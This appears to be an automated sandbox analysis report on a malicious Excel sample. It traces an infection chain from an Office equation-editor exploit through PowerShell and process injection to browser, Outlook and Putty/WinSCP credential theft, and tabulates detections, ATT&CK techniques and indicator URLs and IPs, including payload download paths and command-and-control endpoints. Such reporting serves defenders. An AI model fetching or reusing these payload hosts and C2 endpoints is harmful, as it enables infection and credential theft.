              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\.metadata
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\addons.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\SecurityPreloadState.txt
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\saved-telemetry-pings\d07fbb40-1c13-49f0-9742-db90c57c7811
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\prefs.js
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\times.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\containers.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\AlternateServices.txt
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\pluginreg.dat
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\webappsstore.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\parent.lock
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\blocklist.xml
              Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.605299369.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3192, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
              Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting
              Valid Accounts11
              Native API
              111
              Scripting
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts53
              Exploitation for Client Execution
              1
              DLL Side-Loading
              623
              Process Injection
              1
              Deobfuscate/Decode Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol11
              Data from Local System
              4
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts11
              Command and Scripting Interpreter
              Logon Script (Windows)Logon Script (Windows)21
              Obfuscated Files or Information
              1
              Credentials in Registry
              13
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              21
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell
              Login HookLogin Hook1
              Install Root Certificate
              NTDS27
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              4
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets331
              Security Software Discovery
              SSHKeylogging115
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              File Deletion
              Cached Domain Credentials141
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
              Masquerading
              DCSync13
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Modify Registry
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
              Virtualization/Sandbox Evasion
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron623
              Process Injection
              Network Sniffing1
              Remote System Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
              Hidden Files and Directories
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1448086 Sample: #20240627_Edlen_A.xls Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 71 z2.ink 2->71 91 Snort IDS alert for network traffic 2->91 93 Multi AV Scanner detection for domain / URL 2->93 95 Found malware configuration 2->95 97 21 other signatures 2->97 12 EXCEL.EXE 57 31 2->12         started        16 taskeng.exe 1 2->16         started        signatures3 process4 dnsIp5 81 198.46.177.156, 49162, 49167, 49170 AS-COLOCROSSINGUS United States 12->81 83 z2.ink 54.241.153.192, 49161, 49163, 49164 AMAZON-02US United States 12->83 65 lionsarebeautifult...ionbeautiufl[1].doc, ISO-8859 12->65 dropped 18 wscript.exe 11 12->18         started        22 WINWORD.EXE 339 33 12->22         started        25 rugtucw 16->25         started        file6 process7 dnsIp8 73 paste.ee 18->73 75 paste.ee 188.114.96.3, 443, 49172 CLOUDFLARENETUS European Union 18->75 99 System process connects to network (likely due to code injection or exploit) 18->99 101 Suspicious powershell command line found 18->101 103 Wscript starts Powershell (via cmd or directly) 18->103 113 5 other signatures 18->113 27 powershell.exe 4 18->27         started        77 z2.ink 22->77 55 C:\Users\user\AppData\Roaming\...\z2.ink.url, MS 22->55 dropped 57 C:\Users\user\AppData\Roaming\...\nXPJ.url, MS 22->57 dropped 59 ~WRF{D9BCE685-2557...C-EEF401A63014}.tmp, Composite 22->59 dropped 61 C:\Users\user\AppData\Local\...\1B25204E.doc, ISO-8859 22->61 dropped 105 Microsoft Office launches external ms-search protocol handler (WebDAV) 22->105 107 Office viewer loads remote template 22->107 109 Microsoft Office drops suspicious files 22->109 30 EQNEDT32.EXE 12 22->30         started        file9 111 Connects to a pastebin service (likely for C&C) 73->111 signatures10 process11 file12 131 Suspicious powershell command line found 27->131 133 Suspicious execution chain found 27->133 33 powershell.exe 12 5 27->33         started        67 C:\Users\...\lionarekingofjungleimageshe.vbs, Unicode 30->67 dropped 135 Office equation editor establishes network connection 30->135 137 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 30->137 signatures13 process14 dnsIp15 69 uploaddeimagens.com.br 188.114.97.3, 443, 49173, 49174 CLOUDFLARENETUS European Union 33->69 87 Writes to foreign memory regions 33->87 89 Injects a PE file into a foreign processes 33->89 37 RegAsm.exe 33->37         started        signatures16 process17 signatures18 115 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 37->115 117 Maps a DLL or memory area into another process 37->117 119 Checks if the current machine is a virtual machine (disk enumeration) 37->119 121 Creates a thread in another existing process (thread injection) 37->121 40 explorer.exe 3 5 37->40 injected process19 dnsIp20 79 prolinice.ga 77.232.129.190, 49176, 49177, 80 BSTV-ASRU Russian Federation 40->79 63 C:\Users\user\AppData\Roaming\rugtucw, PE32 40->63 dropped 123 Benign windows process drops PE files 40->123 125 Injects code into the Windows Explorer (explorer.exe) 40->125 127 Writes to foreign memory regions 40->127 129 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->129 45 explorer.exe 6 40->45         started        49 explorer.exe 40->49         started        51 explorer.exe 40->51         started        53 6 other processes 40->53 file21 signatures22 process23 dnsIp24 85 prolinice.ga 45->85 139 System process connects to network (likely due to code injection or exploit) 45->139 141 Found evasive API chain (may stop execution after checking mutex) 45->141 143 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 45->143 147 3 other signatures 45->147 145 Tries to harvest and steal browser information (history, passwords, etc) 49->145 signatures25

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              #20240627_Edlen_A.xls3%ReversingLabs
              #20240627_Edlen_A.xls6%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B25204E.doc100%AviraHEUR/Rtf.Malformed
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc100%AviraHEUR/Rtf.Malformed
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D9BCE685-2557-45B4-B3BC-EEF401A63014}.tmp100%AviraEXP/CVE-2017-11882.Gen
              C:\Users\user\AppData\Roaming\rugtucw0%ReversingLabs
              C:\Users\user\AppData\Roaming\rugtucw0%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              paste.ee3%VirustotalBrowse
              z2.ink4%VirustotalBrowse
              uploaddeimagens.com.br5%VirustotalBrowse
              prolinice.ga4%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://ocsp.entrust.net030%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              https://analytics.paste.ee0%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              http://ocsp.entrust.net0D0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://secure.gravatar.com0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://prolinice.ga/ndex.php0%Avira URL Cloudsafe
              http://crl.entrust.net/server1.crl00%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              http://java.sun.com0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
              http://198.46.177.156/8080/lionarekingofjungleimageshere.bmp0%Avira URL Cloudsafe
              https://support.mozilla.org0%URL Reputationsafe
              http://crl.use0%Avira URL Cloudsafe
              https://secure.comodo.com/CPS00%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://themes.googleusercontent.com0%URL Reputationsafe
              http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
              https://paste.ee/n0%Avira URL Cloudsafe
              http://198.46.177.156/8080/RBG.txt0%Avira URL Cloudsafe
              https://paste.ee/e0%Avira URL Cloudsafe
              https://duckduckgo.com/ac/?q=0%VirustotalBrowse
              http://prolinice.ga/ndex.php1%VirustotalBrowse
              http://198.46.177.156/8080/RBG.txt8%VirustotalBrowse
              https://www.google.com0%Avira URL Cloudsafe
              https://paste.ee/n0%VirustotalBrowse
              http://aikpfjvjuwcsxfjs.net/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
              https://paste.ee/e2%VirustotalBrowse
              http://www.autoitscript.com/autoit30%Avira URL Cloudsafe
              http://aikpfjvjuwcsxfjs.net/0%Avira URL Cloudsafe
              https://cdnjs.cloudflare.com0%Avira URL Cloudsafe
              https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
              https://www.google.com0%VirustotalBrowse
              http://prolinice.ga/index.php0%Avira URL Cloudsafe
              https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
              http://z2.ink/0%Avira URL Cloudsafe
              http://vilendar.ga/index.php0%Avira URL Cloudsafe
              https://cdnjs.cloudflare.com0%VirustotalBrowse
              http://prolinice.ga/index.php.0%Avira URL Cloudsafe
              http://www.piriform.com/ccleanerxe0%Avira URL Cloudsafe
              http://prolinice.ga/index.php2%VirustotalBrowse
              http://z2.ink/4%VirustotalBrowse
              https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634100%Avira URL Cloudmalware
              http://vilendar.ga/index.php0%VirustotalBrowse
              https://paste.ee/d/Bo3r40%Avira URL Cloudsafe
              http://prolinice.ga/0%Avira URL Cloudsafe
              https://www.google.com;0%Avira URL Cloudsafe
              https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?171630763413%VirustotalBrowse
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
              http://www.autoitscript.com/autoit30%VirustotalBrowse
              https://paste.ee/d/Bo3r4gj0%Avira URL Cloudsafe
              https://www.google.com/favicon.ico0%Avira URL Cloudsafe
              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv0%Avira URL Cloudsafe
              https://uploaddeimagens.com.br0%Avira URL Cloudsafe
              http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
              https://analytics.paste.ee;0%Avira URL Cloudsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
              http://prolinice.ga/4%VirustotalBrowse
              http://www.piriform.com/ccleaner0%Avira URL Cloudsafe
              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv0%VirustotalBrowse
              https://www.google.com/favicon.ico0%VirustotalBrowse
              http://198.46.177.156/8080/lionarekingofjungleimageshere.bmpj0%Avira URL Cloudsafe
              https://uploaddeimagens.com.br7%VirustotalBrowse
              http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.01%VirustotalBrowse
              http://prolinice.ga/index.phpMozilla/5.00%Avira URL Cloudsafe
              http://198.46.177.156/xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc0%Avira URL Cloudsafe
              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
              http://www.piriform.com/ccleaner0%VirustotalBrowse
              http://198.46.177.156/xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc8%VirustotalBrowse
              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%VirustotalBrowse
              http://prolinice.ga/index.phpMozilla/5.01%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              paste.ee
              188.114.96.3
              truetrueunknown
              z2.ink
              54.241.153.192
              truetrueunknown
              uploaddeimagens.com.br
              188.114.97.3
              truetrueunknown
              prolinice.ga
              77.232.129.190
              truetrueunknown
              NameMaliciousAntivirus DetectionReputation
              http://198.46.177.156/8080/lionarekingofjungleimageshere.bmptrue
              • Avira URL Cloud: safe
              unknown
              http://198.46.177.156/8080/RBG.txttrue
              • 8%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://prolinice.ga/index.phptrue
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://vilendar.ga/index.phptrue
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634true
              • 13%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              https://paste.ee/d/Bo3r4true
              • Avira URL Cloud: safe
              unknown
              http://198.46.177.156/xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doctrue
              • 8%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabexplorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.drfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://prolinice.ga/ndex.phpexplorer.exe, 00000012.00000002.526156313.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://duckduckgo.com/ac/?q=explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.drfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://ocsp.entrust.net03wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://contoso.com/Licensepowershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://crl.usewscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://paste.ee/nwscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://analytics.paste.eewscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.diginotar.nl/cps/pkioverheid0wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://paste.ee/ewscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmpfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.google.comwscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://aikpfjvjuwcsxfjs.net/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 0000000E.00000002.607048894.0000000007987000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/powershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://aikpfjvjuwcsxfjs.net/explorer.exe, 0000000E.00000002.606049641.00000000026D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.607048894.0000000007987000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.autoitscript.com/autoit3explorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://cdnjs.cloudflare.comwscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://cdnjs.cloudflare.com;wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://ocsp.entrust.net0Dwscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://z2.ink/z2.ink.url.4.drfalse
              • 4%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.528301367.000000000259A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.454053406.00000000022A1000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://secure.gravatar.comwscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://prolinice.ga/index.php.explorer.exe, 0000000E.00000002.606049641.00000000026D2000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.piriform.com/ccleanerxeexplorer.exe, 0000000E.00000002.606049641.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.465326275.000000000260D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://crl.entrust.net/server1.crl0wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://prolinice.ga/explorer.exe, 00000012.00000002.526156313.0000000000694000.00000004.00000020.00020000.00000000.sdmptrue
              • 4%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.google.com;wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/Iconpowershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.drfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchexplorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.drfalse
              • URL Reputation: safe
              unknown
              https://paste.ee/d/Bo3r4gjwscript.exe, 00000009.00000003.419004224.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422008414.0000000000816000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.google.com/favicon.icoF8D.tmp.18.drfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://ac.ecosia.org/autocomplete?q=explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.drfalse
              • URL Reputation: safe
              unknown
              http://java.sun.comexplorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
